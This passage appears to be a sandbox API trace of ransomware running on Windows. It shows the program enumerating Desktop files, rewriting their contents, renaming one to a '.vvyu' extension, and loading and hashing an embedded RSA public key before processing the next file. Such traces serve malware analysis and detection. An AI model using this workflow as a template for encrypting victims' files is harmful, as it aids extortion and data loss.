Flags=0x0, Size=0x558) returned 0x2d42908 [0190.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0190.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0190.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0190.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c28 [0190.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39c10 [0190.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0190.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0190.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0190.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0190.864] GetCurrentThreadId () returned 0x264 [0190.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44ab0 [0190.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0190.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0190.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.865] GetCurrentThreadId () returned 0x264 [0190.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0190.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0190.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0190.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c28 [0190.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c88 [0190.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0190.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0190.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0190.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ca0 [0190.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c40 [0190.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0190.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c10 [0190.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0190.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30a30 | out: hHeap=0x6a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.878] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x14402, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x14402, lpOverlapped=0x0) returned 1 [0190.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.879] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14407, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.879] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0190.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0190.880] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.881] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.881] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.881] CloseHandle (hObject=0x584) returned 1 [0190.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0190.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0190.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0190.883] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\jBc88bXGG.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\jbc88bxgg.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\jBc88bXGG.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\jbc88bxgg.swf.vvyu")) returned 1 [0190.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.884] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0190.887] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65346e60, ftCreationTime.dwHighDateTime=0x1d8a455, ftLastAccessTime.dwLowDateTime=0x8908fc30, ftLastAccessTime.dwHighDateTime=0x1d8a486, ftLastWriteTime.dwLowDateTime=0x8908fc30, ftLastWriteTime.dwHighDateTime=0x1d8a486, nFileSizeHigh=0x0, nFileSizeLow=0x9445, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QwaTwvQX1o7erS.mp3", cAlternateFileName="QWATWV~1.MP3")) returned 1 [0190.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0190.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0190.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0190.887] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\QwaTwvQX1o7erS.mp3") returned=".mp3" [0190.888] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\QwaTwvQX1o7erS.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\qwatwvqx1o7ers.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.888] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=37957) returned 1 [0190.888] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.890] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x941f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.890] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.892] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.893] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x9445, lpOverlapped=0x0) returned 1 [0190.893] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.893] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.893] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.893] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0190.894] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.894] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.894] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.894] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.895] GetLastError () returned 0x0 [0190.895] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0190.895] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0190.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.895] 